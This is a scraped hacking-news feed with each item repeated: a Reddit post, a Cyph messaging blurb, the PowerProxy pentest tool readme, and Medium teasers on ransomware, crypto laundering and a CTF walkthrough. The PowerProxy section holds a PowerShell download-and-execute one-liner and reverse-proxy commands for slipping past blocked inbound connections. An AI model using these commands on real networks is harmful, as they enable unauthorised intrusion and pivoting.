hacking: security in practice
we hacked an email address to secretly chat with someone
I've been using an email address for a few weeks to secretly chat with someone. However I decided to delete this Google account a two weeks ago but she received a stupid email from this address 3 days ago when it was supposed to be deleted He sent her an e-mail containing drafts that I had written for her. She now feels someone is spying on her... Have you ever seen a hacker do this kind of stupid thing on an empty email address?
submitted by /u/Eleynix
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
we hacked an email address to secretly chat with someone
I've been using an email address for a few weeks to secretly chat with someone. However I decided to delete this Google account a two weeks ago but she received a stupid email from this address 3 days ago when it was supposed to be deleted He sent her an e-mail containing drafts that I had written for her. She now feels someone is spying on her... Have you ever seen a hacker do this kind of stupid thing on an empty email address?
submitted by /u/Eleynix
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
we hacked an email address to secretly chat with someone
I've been using an email address for a few weeks to secretly chat with someone. However I decided to delete this Google account a two weeks ago...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Cyph : Cryptographically Secure Messaging And Social Networking Service
Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy combined with best-in-class ease of use.
Cyph’s patented technology — built by former SpaceX engineers, audited by Cure53, and the basis of research presentations at Black Hat and DEF CON — uniquely allows Cyph to solve the major security and usability limitations of conventional solutions.
Commands available to run locally (Node.js and Docker required):
*
*
Running any of these commands for the first time will build the Docker image locally, which may take a while.
Cyph is run by founders Ryan Lester and Josh Boehm, former SpaceX engineers and best friends of over 20 years who had spent many all-nighters working closely together on various software projects. Cyph was initially started through the Mach37 Cyber Accelerator, and is currently backed by the Goel Fund and Center for Innovative Technology.
Cyph was a natural project for us to start together, as we’ve always shared an interest in cypherpunk efforts to enhance individual freedom and privacy.
We spent our teens getting into programming; tinkering with Tor, Linux, and OTR encryption; and mining Bitcoin before it was cool. As adults (who regularly handled ITAR-sensitive information at SpaceX), the difficulty of communicating privately online had become a palpable thorn in our side — existing solutions were cumbersome to use, missing basic features, and not really all that secure in practice. The revelations brought to light by Edward Snowden ultimately inspired us to take this upon ourselves.
We knew there could be a better way, so we created Cyph.
Download
___________________________
@hacking_Attack
@Hacking_Video
Cyph : Cryptographically Secure Messaging And Social Networking Service
Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy combined with best-in-class ease of use.
Cyph’s patented technology — built by former SpaceX engineers, audited by Cure53, and the basis of research presentations at Black Hat and DEF CON — uniquely allows Cyph to solve the major security and usability limitations of conventional solutions.
Commands available to run locally (Node.js and Docker required):
*
npm run serve: Serves a local instance at http://localhost:42002*
npm run verify: Verifies that the signed production build is reproducible against the local copy of the codeRunning any of these commands for the first time will build the Docker image locally, which may take a while.
Cyph is run by founders Ryan Lester and Josh Boehm, former SpaceX engineers and best friends of over 20 years who had spent many all-nighters working closely together on various software projects. Cyph was initially started through the Mach37 Cyber Accelerator, and is currently backed by the Goel Fund and Center for Innovative Technology.
Cyph was a natural project for us to start together, as we’ve always shared an interest in cypherpunk efforts to enhance individual freedom and privacy.
We spent our teens getting into programming; tinkering with Tor, Linux, and OTR encryption; and mining Bitcoin before it was cool. As adults (who regularly handled ITAR-sensitive information at SpaceX), the difficulty of communicating privately online had become a palpable thorn in our side — existing solutions were cumbersome to use, missing basic features, and not really all that secure in practice. The revelations brought to light by Edward Snowden ultimately inspired us to take this upon ourselves.
We knew there could be a better way, so we created Cyph.
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Cyph : Cryptographically Secure Messaging And Social Networking Service
Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities
PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.
Setup
Import the script:
iex (new-object net.webclient).downloadstring(“http://192.168.0.22/PowerProxy.ps1”)
OR
Import-Module \192.168.0.22\Public\PowerProxy.ps1
reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn’t installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the –no-encrypt option.
Usage
For detailed usage, check out PowerProxy’s help, or use ./reverse_proxy_handler.py –help
Run a reverse proxy
On local machine, start the handler:
Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080
In PowerShell:
Start-ReverseSocksProxy 172.1.1.20 -Port 8080
Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:
curl –socks4 127.0.0.1:1080 http://10.10.2.69/
Run a traditional SOCKS server
Start-SocksProxy 172.10.2.20 -Port 9050
Require authentication
Use PSCredential objects to require a username and password:
Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force “Passw0rd123”
$Cred = New-Object System.Management.Automation.PSCredential (“ProxyUser”, $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose
Download
___________________________
@hacking_Attack
@Hacking_Video
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities
PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.
Setup
Import the script:
iex (new-object net.webclient).downloadstring(“http://192.168.0.22/PowerProxy.ps1”)
OR
Import-Module \192.168.0.22\Public\PowerProxy.ps1
reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn’t installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the –no-encrypt option.
Usage
For detailed usage, check out PowerProxy’s help, or use ./reverse_proxy_handler.py –help
Run a reverse proxy
On local machine, start the handler:
Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080
In PowerShell:
Start-ReverseSocksProxy 172.1.1.20 -Port 8080
Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:
curl –socks4 127.0.0.1:1080 http://10.10.2.69/
Run a traditional SOCKS server
Start-SocksProxy 172.10.2.20 -Port 9050
Require authentication
Use PSCredential objects to require a username and password:
Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force “Passw0rd123”
$Cred = New-Object System.Management.Automation.PSCredential (“ProxyUser”, $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities
PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities. PowerProxy is written with penetration testers in mind.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Thrive Acquires DSM
DSM is now the third acquisition by Thrive in Florida in the past six months.
___________________________
@hacking_Attack
@Hacking_Video
Thrive Acquires DSM
DSM is now the third acquisition by Thrive in Florida in the past six months.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Thrive Acquires DSM
DSM is now the third acquisition by Thrive in Florida in the past six months.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How hackers launder and cash out their stolen crypto funds
https://cdn-images-1.medium.com/max/900/1*mFhUUP9V4t-D3LA51a4G0A.jpeg
Cryptocurrency thefts and hacks have become somewhat of a trend recently, as we’ve seen with the recent Ronin Bridge hack (Axie Infinity)…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How hackers launder and cash out their stolen crypto funds
https://cdn-images-1.medium.com/max/900/1*mFhUUP9V4t-D3LA51a4G0A.jpeg
Cryptocurrency thefts and hacks have become somewhat of a trend recently, as we’ve seen with the recent Ronin Bridge hack (Axie Infinity)…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How hackers launder and cash out their stolen crypto funds
Cryptocurrency thefts and hacks have become somewhat of a trend recently, as we’ve seen with the recent Ronin Bridge hack (Axie Infinity)…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Danger of Unsanitized Data
https://cdn-images-1.medium.com/max/1584/1*2awLcsEPQo0ma3UtGi-k2g.png
The tale of exploitation
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Danger of Unsanitized Data
https://cdn-images-1.medium.com/max/1584/1*2awLcsEPQo0ma3UtGi-k2g.png
The tale of exploitation
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Danger of Unsanitized Data
The tale of exploitation
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Ransomware with Python
https://cdn-images-1.medium.com/max/961/1*q1ddXOUO5vFmxuyY1EKKqw.png
Hello Medium Hackers,
Hope You all doing well.
Lets try something dangerous today.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Ransomware with Python
https://cdn-images-1.medium.com/max/961/1*q1ddXOUO5vFmxuyY1EKKqw.png
Hello Medium Hackers,
Hope You all doing well.
Lets try something dangerous today.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ransomware with Python
Hello Medium Hackers,
Hope You all doing well.
Lets try something dangerous today.
Hope You all doing well.
Lets try something dangerous today.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe CTF: Bounty Hacker — Walkthrough
https://cdn-images-1.medium.com/max/701/1*yN3n_8wQYogE-N5S4HNT8w.png
Hi! This is my walkthrough on hacking the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe CTF: Bounty Hacker — Walkthrough
https://cdn-images-1.medium.com/max/701/1*yN3n_8wQYogE-N5S4HNT8w.png
Hi! This is my walkthrough on hacking the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe CTF: Bounty Hacker — Walkthrough
Hi! This is my walkthrough on hacking the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How I ‘hacked’ Wi-Fi at Railway Station to get free internet?
https://cdn-images-1.medium.com/max/625/1*IhuoaN8SVnJwCWikPSSbkQ.jpeg
(This blog is intended for educational purposes. I don’t want to go crazy over the website and I’m not responsible for any damage…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How I ‘hacked’ Wi-Fi at Railway Station to get free internet?
https://cdn-images-1.medium.com/max/625/1*IhuoaN8SVnJwCWikPSSbkQ.jpeg
(This blog is intended for educational purposes. I don’t want to go crazy over the website and I’m not responsible for any damage…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I ‘hacked’ Wi-Fi at Railway Station to get free internet?
(This blog is intended for educational purposes. I don’t want to go crazy over the website and I’m not responsible for any damage inflicted…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
La Autoridad de Protección de Datos de Italia advierte a los sitios web contra el uso de Google…
https://cdn-images-1.medium.com/max/1550/0*el_616dw7Hk9AaoY
PUBLICADO EN 27 JUNIO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
La Autoridad de Protección de Datos de Italia advierte a los sitios web contra el uso de Google…
https://cdn-images-1.medium.com/max/1550/0*el_616dw7Hk9AaoY
PUBLICADO EN 27 JUNIO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
La Autoridad de Protección de Datos de Italia advierte a los sitios web contra el uso de Google Analytics
PUBLICADO EN 27 JUNIO, 2022POR EHACKING